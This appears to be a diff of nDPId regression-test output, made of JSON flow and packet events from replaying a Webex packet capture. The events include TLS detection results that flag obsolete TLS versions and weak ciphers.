+00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1308,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700561,"flow_last_seen":1444570700615,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570700615,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1310,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700563,"flow_last_seen":1444570700616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570700616,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1312,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700561,"flow_last_seen":1444570700767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1313,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700563,"flow_last_seen":1444570700767,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1408,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570712008,"flow_last_seen":1444570712008,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570712008,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1444570712008,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570712008,"pkt":"ABoRAAACABoRAAABCABFAAA8BPxAAEAGfVYKCAABrfMAbtmHAbtwYOR3AAAAAKACOQhFnAAAAgQFtAQCCAoATOCLAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1444570712012,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570712012,"pkt":"ABoRAAACABoRAAABCABFAAAoA7pAABAGrqyt8wBuCggAAQG72YePnxuIcGDkeFAS\/\/8cJQAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1444570712013,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570712013,"pkt":"ABoRAAACABoRAAABCABFAAAoBP1AAEAGfWkKCAABrfMAbtmHAbtwYOR4j58biVAQOQjjHQAA"} +00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1411,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570712008,"flow_last_seen":1444570712016,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570712016,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1416,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570712008,"flow_last_seen":1444570713707,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570713707,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570713719,"flow_last_seen":1444570713719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570713719,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1444570713719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570713719,"pkt":"ABoRAAACABoRAAABCABFAAA8m55AAEAG1oYKCAABUEpuRIMXAbuTJntGAAAAAKACOQjR\/QAAAgQFtAQCCAoATODYAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1444570713727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570713727,"pkt":"ABoRAAACABoRAAABCABFAAAoA8NAABAGnnZQSm5ECggAAQG7gxds2YS5kyZ7R1AS\/\/9iaAAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1444570713730,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570713730,"pkt":"ABoRAAACABoRAAABCABFAAAom59AAEAG1pkKCAABUEpuRIMXAbuTJntHbNmEulAQOQgpYQAA"} +00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1429,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570713719,"flow_last_seen":1444570713734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570713734,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1433,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570713719,"flow_last_seen":1444570715238,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570715238,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570716599,"flow_last_seen":1444570716599,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570716599,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1444570716599,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570716599,"pkt":"ABoRAAACABoRAAABCABFAAA8ldZAAEAGdtEKCAABPm3lnsqRAbsgVHeCAAAAAKACOQiaIAAAAgQFtAQCCAoATOJUAAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1444570716603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570716603,"pkt":"ABoRAAACABoRAAABCABFAAAoA9FAABAGOOs+beWeCggAAQG7ypHfq4h9IFR3g1AS\/\/+1cAAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1444570716604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570716604,"pkt":"ABoRAAACABoRAAABCABFAAAolddAAEAGduQKCAABPm3lnsqRAbsgVHeD36uIflAQOQh8aQAA"} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1457,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570716599,"flow_last_seen":1444570716610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570716610,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1460,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570716599,"flow_last_seen":1444570717923,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570717923,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1483,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570718801,"flow_last_seen":1444570718801,"flow_idle_time":180000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1444570718801,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51772,"dst_port":9000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1483,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1444570718801,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":50,"pkt_l4_len":16,"thread_ts_msec":1444570718801,"pkt":"ABoRAAACABoRAAABCABFAAAk4zFAAEARKYMKCAABPm3lnso8IygAEONTAQAAAAAAAAE="} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1444570718921,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":50,"pkt_l4_len":16,"thread_ts_msec":1444570718921,"pkt":"ABoRAAACABoRAAABCABFAAAkA95AABARONc+beWeCggAASMoyjwAEESbAgAAAAC4nQE="} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1485,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1444570718924,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":50,"pkt_l4_len":16,"thread_ts_msec":1444570718924,"pkt":"ABoRAAACABoRAAABCABFAAAk4zJAAEARKYIKCAABPm3lnso8IygAEONTAQAAAAAAAAE="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1491,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570719041,"flow_last_seen":1444570719041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570719041,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1491,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1444570719041,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570719041,"pkt":"ABoRAAACABoRAAABCABFAAA8mB5AAEAGdIkKCAABPm3lnsqTAbu3\/XtaAAAAAKACOQj9rAAAAgQFtAQCCAoATONEAAAAAAEDAwY="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1444570719047,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570719047,"pkt":"ABoRAAACABoRAAABCABFAAAoA+JAABAGONo+beWeCggAAQG7ypNIAoSlt\/17W1AS\/\/+1bgAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1444570720045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570720045,"pkt":"ABoRAAACABoRAAABCABFAAAoAABAAEAGDLwKCAABPm3lnsqTAbu3\/XtbAAAAAFAEAACCJAAA"} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1527,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570732086,"flow_last_seen":1444570732086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570732086,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1527,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1444570732086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570732086,"pkt":"ABoRAAACABoRAAABCABFAAA8h\/tAAEAGidIKCAABPm3geMf2AbvHvWEvAAAAAKACOQgMSwAAAgQFtAQCCAoATObUAAAAAAEDAwY="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1528,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1444570732090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570732090,"pkt":"ABoRAAACABoRAAABCABFAAAoA+tAABAGPfc+beB4CggAAQG7x\/Y4Qp7Qx71hMFAS\/\/+9MQAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1531,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1444570733095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570733095,"pkt":"ABoRAAACABoRAAABCABFAAA8h\/xAAEAGidEKCAABPm3geMf2AbvHvWEvAAAAAKACOQgL5wAAAgQFtAQCCAoATOc4AAAAAAEDAwY="} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1536,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570732086,"flow_last_seen":1444570733112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1444570733112,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1544,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570738415,"flow_last_seen":1444570738415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570738415,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1544,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1444570738415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570738415,"pkt":"ABoRAAACABoRAAABCABFAAA8pZ5AAEAGbC8KCAABPm3geMf6AbsEHk9CAAAAAKACOQjdywAAAgQFtAQCCAoATOrcAAAAAAEDAwY="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1444570738418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738418,"pkt":"ABoRAAACABoRAAABCABFAAAoA+9AABAGPfM+beB4CggAAQG7x\/r74bC9BB5PQ1AS\/\/+9LQAA"} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1546,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570738419,"flow_last_seen":1444570738419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570738419,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1546,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1444570738419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570738419,"pkt":"ABoRAAACABoRAAABCABFAAA8eOlAAEAGmOQKCAABPm3geMf7AbvAYZI1AAAAAKACOQjekwAAAgQFtAQCCAoATOrcAAAAAAEDAwY="} 